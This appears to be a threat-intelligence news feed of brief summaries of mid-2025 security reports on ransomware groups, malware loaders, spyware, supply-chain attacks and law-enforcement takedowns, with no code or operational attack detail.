The Anubis ransomware-as-a-service (RaaS) has added a new file-wiping module, making data recovery impossible even after ransom payment. This destructive feature aims to pressure victims into quick payment and increases the threat level of Anubis attacks. #Anubis #Ransomware #DarkWeb
Tag: INITIAL ACCESS
Insikt Group uncovered new infrastructure and infection methods employed by GrayAlpha, a cybercriminal group overlapping with FIN7, including custom loaders PowerNet and MaskBat leading to NetSupport RAT infections. The report highlights three primary infection vectors and emphasizes the importance of application allow-lists, employee training, and updated detection rules to combat these threats. #GrayAlpha #FIN7 #NetSupportRAT #PowerNet #MaskBat
Ransomware groups have exploited a vulnerability in SimpleHelp remote device control software to target and disrupt utility billing software users. Federal agencies urge immediate patching, as this exploit has been linked to multiple ransomware strains and attacks on retail chains. #SimpleHelpVulnerability #CVE202457727…
Ransomware actors are exploiting unpatched SimpleHelp RMM instances to target utility billing software customers, emphasizing the need for updates and threat mitigation. The attack pattern highlights ongoing vulnerabilities exploited by groups like DragonForce and others, with mitigation strategies recommended by CISA. #SimpleHelp #DragonForce…
The recent Fog ransomware attack utilized legitimate and open-source tools typically linked to espionage, indicating a possible cyber-espionage motive. The attack targeted a financial institution in Asia and involved advanced lateral movement and data exfiltration techniques. #FogRansomware #APT41 #Syteca #GC2 #Stowaway…
Malicious open source packages targeting blockchain developers are increasingly used to steal cryptowallet credentials, drain funds, mine cryptocurrency, and hijack clipboard data. Threat actors, including nation-state groups, exploit supply chain vulnerabilities in registries like npm and PyPI, impacting ecosystems such as Ethereum, Solana, TRON, and TON. #ContagiousInterview #BeaverTail #InvisibleFerret #XMRig #ClipboardHijackers
In May 2025, an unusual ransomware attack using the Fog ransomware targeted a financial institution in Asia, employing rare tools such as Syteca employee monitoring software and open-source pentesting utilities like GC2, Adaptix, and Stowaway. The attackers also established persistence on the network post-ransomware deployment, indicating possible espionage motives beyond typical ransomware objectives. #FogRansomware #Syteca #GC2 #Adaptix #Stowaway
Predator spyware operations continue despite sanctions and public exposure, with a resurgence noted including a new operator in Mozambique. The spyware’s infrastructure involves multi-tiered, evasive tactics linked to known Predator operators and a Czech entity associated with the Intellexa Consortium. #Predator #Intellexa #Mozambique
%20(1).webp "CISA Issues Comprehensive Guide to Safeguard Network Edge Devices from Cyber Threats")
A collaborative effort among international cybersecurity agencies has resulted in comprehensive guidance to protect network edge devices and appliances. The guidance addresses vulnerabilities in devices like firewalls, routers, IoT devices, and OT systems, emphasizing mitigation strategies and secure deployment practices. #CISA #EdgeDevices #CyberThreats #FirewallVulnerabilities #IoTSecurity…
A cyberattack on Mooonux, a web development firm, led to the alleged theft and sale of its full database and server access. This breach affects not only Mooonux but also eight client websites, risking extensive sensitive data exposure. #Mooonux #FileZilla #DataLeak…
Over 20,000 malicious IP addresses linked to information stealers were taken down during INTERPOL’s Operation Secure, involving 26 countries. The operation resulted in the seizure of servers, arrests, and the disruption of cybercriminal infrastructure affecting victims across Asia. #Infostealers #OperationSecure
ClickFix is a social engineering technique exploiting end users by disguising malicious PowerShell commands as routine verification prompts, enabling threat actors to gain network access and exfiltrate data. Since March 2024, various threat actors including APT28 and MuddyWater have leveraged this method to target multiple industries globally. #ClickFix #APT28 #MuddyWater
Cybercriminals tied to the Black Basta ransomware operation are evolving their tactics, using email bombing, Teams phishing, and Python scripts to gain persistent access to networks. The threat landscape is shifting as former affiliates potentially migrate to other ransomware groups like CACTUS or BlackLock, while new malware and attack strategies emerge….
A global law enforcement operation successfully arrested suspects and dismantled thousands of malicious IPs linked to information-stealing malware. The crackdown targeted malware variants like Lumma, Risepro, and Meta, while alerting hundreds of thousands of victims about potential breaches. #Lumma #Risepro #Meta #Cybercrime #Infostealer…
MISSION2025, also known as APT41, is a Chinese state-sponsored threat group active since 2012, focusing on cyberespionage and financially motivated attacks aligned with China’s strategic goals. Their recent campaigns feature sophisticated use of cloud services for command and control and exploitation of software vulnerabilities to target governments and critical infrastructure globally. #MISSION2025 #APT41 #TOUGHPROGRESS #IvantiEPMM